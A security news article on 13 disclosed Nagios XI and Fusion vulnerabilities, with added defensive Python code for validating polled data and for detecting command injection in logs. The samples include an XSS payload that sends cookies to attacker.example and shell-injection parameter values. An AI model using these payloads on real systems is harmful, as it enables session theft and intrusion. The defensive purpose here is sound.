Cybersecurity researchers have disclosed details of 13 vulnerabilities in the Nagios network monitoring application that could be exploited by an attacker to hijack the monitored infrastructure without any operator intervention.
“In a telco setting, where the telco monitors thousands of sites, if a customer’s site is completely compromised, an attacker could exploit the vulnerabilities to breach the telco and then compromise all other monitored customer sites,” said Adi Ashkenazy, CEO of the Australian cybersecurity company Skylight Cyber, in an email to The Hacker News.
Nagios is an open-source IT infrastructure tool, similar to SolarWinds’ Network Performance Monitor (NPM), that provides monitoring and alerting services for servers, network cards, applications, and services.
Chief among them is CVE-2020-28648 (CVSS score: 8.8), a flaw in the Auto-Discovery component of Nagios XI, which the researchers used as the starting point of an exploit chain that strings together a total of five vulnerabilities to achieve a “powerful upstream attack.”
“That is, if an attacker compromises a monitored customer site running a Nagios XI server, they could compromise the carrier’s management server and all other monitored customers,” the researchers said in a write-up published last week.
In other words, the attack scenario starts by targeting the Nagios XI server at a customer site, using CVE-2020-28648 and CVE-2020-28910 to obtain remote code execution and then elevate privileges to root. With that server effectively compromised, the attacker can send tainted data to the upstream Nagios Fusion server, which centralises visibility across the infrastructure by polling the Nagios XI servers on a regular basis. The trust relationship runs in the wrong direction for the defender: the central server consumes whatever the monitored servers return, so a compromised member server becomes an input channel into the management tier.
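The upstream direction of the attack comes down to how a central poller treats data returned by the servers it monitors. The following is an added illustration of that point, written for this page and not code from Nagios, Skylight Cyber or The Hacker News: the JSON shape of the poll response, the field names and the HTML rendering are all assumptions chosen to make the pattern visible, not the real Fusion/XI polling protocol. The first renderer trusts the polled record the way a naive central console would; the second treats the monitored server as an untrusted input source, rejects anything outside the narrow shape it expects, and escapes on output.

```python
import html
import json
import re

# Constructed sample of what a compromised member server could hand back to the
# central poller. The JSON layout is an assumption for this example only.
TAINTED_POLL_RESPONSE = json.dumps({
    "host_name": "db01<script>document.location='http://attacker.example/?c='+document.cookie</script>",
    "current_state": "0",
    "plugin_output": "OK - load average: 0.10",
})

# Narrow allow-lists: a host name is DNS-label-like, a state is one of three codes.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-]{0,252}$")
ALLOWED_STATES = {"0": "UP", "1": "DOWN", "2": "UNREACHABLE"}


def render_host_row_unsafe(poll_json: str) -> str:
    """Vulnerable pattern: trusts the polled record and interpolates it into HTML."""
    d = json.loads(poll_json)
    return (f"<tr><td>{d['host_name']}</td><td>{d['current_state']}</td>"
            f"<td>{d['plugin_output']}</td></tr>")


def validate_poll_response(poll_json: str) -> dict:
    """Hardened pattern, step 1: reject data that does not match the expected shape
    instead of trying to sanitise arbitrary content from a monitored server."""
    d = json.loads(poll_json)
    host = str(d.get("host_name", ""))
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected host_name from polled server: {host!r}")
    state = str(d.get("current_state", ""))
    if state not in ALLOWED_STATES:
        raise ValueError(f"rejected current_state from polled server: {state!r}")
    # Free-text plugin output cannot be allow-listed, so bound it and escape it later.
    output = str(d.get("plugin_output", ""))[:1024]
    return {"host_name": host, "current_state": ALLOWED_STATES[state],
            "plugin_output": output}


def render_host_row_safe(poll_json: str) -> str:
    """Hardened pattern, step 2: validate first, then escape every field on output."""
    d = validate_poll_response(poll_json)
    cells = "".join(f"<td>{html.escape(v)}</td>" for v in d.values())
    return f"<tr>{cells}</tr>"


def classify(poll_json: str) -> str:
    """Returns 'rendered' or 'rejected', so the poller can alert when a member server
    starts returning malformed data instead of silently displaying it."""
    try:
        render_host_row_safe(poll_json)
        return "rendered"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    print(render_host_row_unsafe(TAINTED_POLL_RESPONSE))  # script tag reaches the browser
    print(classify(TAINTED_POLL_RESPONSE))                 # rejected
```

The design choice worth copying is the order of operations: validate against an allow-list at the trust boundary, and only then escape for the output context. Escaping alone would have stopped the script tag here, but it would not have caught a state code outside the expected set, and it does nothing for fields that are later passed to a shell or a database rather than a browser.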
The researchers have also published a PHP-based post-exploitation tool called SoyGun that chains the vulnerabilities together and “allows an attacker with Nagios XI user credentials and HTTP access to the Nagios XI server to have full control over the Nagios Fusion deployment.”
Below is a summary of the 13 vulnerabilities:
- CVE-2020-28648 - Nagios XI authenticated remote code execution (from the context of a low-privileged user)
- CVE-2020-28900 - Nagios Fusion and XI privilege escalation from nagios to root via upgrade_to_latest.sh
- CVE-2020-28901 - Nagios Fusion privilege escalation from apache to nagios via command injection in the component_dir parameter of cmd_subsys.php
- CVE-2020-28902 - Nagios Fusion privilege escalation from apache to nagios via command injection in the timezone parameter of cmd_subsys.php
- CVE-2020-28903 - XSS in Nagios XI when the attacker controls a Fusion server
- CVE-2020-28904 - Nagios Fusion privilege escalation from apache to nagios via installation of malicious components
- CVE-2020-28905 - Nagios Fusion authenticated remote code execution (from the context of a low-privileged user)
- CVE-2020-28906 - Nagios Fusion and XI privilege escalation from nagios to root via modification of fusion-sys.cfg / xi-sys.cfg
- CVE-2020-28907 - Nagios Fusion privilege escalation from apache to root via upgrade_to_latest.sh and modification of the proxy settings
- CVE-2020-28908 - Nagios Fusion privilege escalation from apache to nagios via command injection in cmd_subsys.php (caused by inadequate sanitisation)
- CVE-2020-28909 - Nagios Fusion privilege escalation from nagios to root via modification of scripts that can be run with sudo
- CVE-2020-28910 - Nagios XI privilege escalation via getprofile.sh
- CVE-2020-28911 - Nagios Fusion information disclosure: a low-privileged user can authenticate to the Fusion server if credentials are stored
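Three of the Fusion escalations above are command injections through named parameters of cmd_subsys.php (component_dir and timezone), which gives a defender something concrete to hunt for in web server logs while patching is scheduled. The detection below is an added example written for this page, not tooling from Skylight Cyber or Nagios: the log lines are constructed, the URL prefix /nagiosfusion/admin/ and the cmd values are assumptions, and the shell-metacharacter heuristic is mine. Only the script name and the two parameter names come from the advisory summary. Note the caveat built into the approach: an Apache access log records the query string but not a POST body, so this catches attempts that put the parameter in the URL; body-borne attempts need a WAF or ModSecurity-style request logging.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format lines, not from a real Nagios host. The path
# prefix and cmd values are assumptions for the sample.
SAMPLE_LOG = """\
10.0.0.5 - nagiosadmin [10/Feb/2021:09:12:01 +0000] "GET /nagiosfusion/admin/cmd_subsys.php?cmd=set_timezone&timezone=Europe%2FLondon HTTP/1.1" 200 412 "-" "Mozilla/5.0"
10.0.0.9 - nagiosadmin [10/Feb/2021:09:13:44 +0000] "GET /nagiosfusion/admin/cmd_subsys.php?cmd=set_timezone&timezone=UTC%3Bid HTTP/1.1" 200 412 "-" "python-requests/2.25"
10.0.0.9 - nagiosadmin [10/Feb/2021:09:14:02 +0000] "GET /nagiosfusion/admin/cmd_subsys.php?cmd=install_component&component_dir=..%2F..%2Ftmp%2Fx%60id%60 HTTP/1.1" 302 0 "-" "python-requests/2.25"
10.0.0.5 - bob [10/Feb/2021:09:15:10 +0000] "GET /nagiosfusion/index.php HTTP/1.1" 200 9312 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameters named in the advisory as command-injection sinks in cmd_subsys.php.
WATCHED_PARAMS = ("component_dir", "timezone")
# Characters that chain or substitute shell commands, plus path traversal. A heuristic
# chosen for this example; a timezone name or component directory never needs them.
SHELL_META_RE = re.compile(r"[;|&`$(){}\n<>]|\.\./")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Decode repeatedly so a double-encoded payload does not slip past the regex."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value


def parse_line(line: str):
    """Split one access-log line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)  # one decode round
    return rec


def find_injection_attempts(log_text: str) -> list:
    """Return one hit per watched parameter whose decoded value carries shell syntax."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/cmd_subsys.php"):
            continue
        for name in WATCHED_PARAMS:
            for raw in rec["params"].get(name, []):
                val = fully_decode(raw)
                if SHELL_META_RE.search(val):
                    hits.append({"ip": rec["ip"], "user": rec["user"], "ts": rec["ts"],
                                 "status": rec["status"], "param": name, "value": val})
    return hits


if __name__ == "__main__":
    for h in find_injection_attempts(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} user={h['user']} {h['param']}={h['value']!r} "
              f"status={h['status']}")
```

Two details matter when this is run over real logs. A 200 or 302 on a hit means the request reached the script, so the status column is what separates an attempt from a blocked one. And because the injections listed above are authenticated, the user field tells you which Nagios account to treat as compromised, which is the pivot point the researchers describe.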
Targeting network monitoring platforms like Nagios, much as SolarWinds, the victim of a large-scale supply chain attack last year, was targeted, could let attackers coordinate intrusions into corporate networks and move laterally across the entire IT estate, turning the monitoring platform into a gateway for more advanced threats.
“The effort required to find and exploit these vulnerabilities is negligible in the context of advanced attackers, especially nation-states,” Ghanem said.
“Imagine how easy this would be for people who spend all their time developing these types of exploits, if it could be done as a quick side project. Combine that with the number of libraries, tools and vendors that exist and are available in a modern network, and we have a big problem on our hands.”
Details disclosed about critical flaws affecting Nagios IT monitoring software
Source: http://feedproxy.google.com/~r/TheHackersNews/~3/VgTYVbIPz7I/details-disclosed-on-critical-flaws.html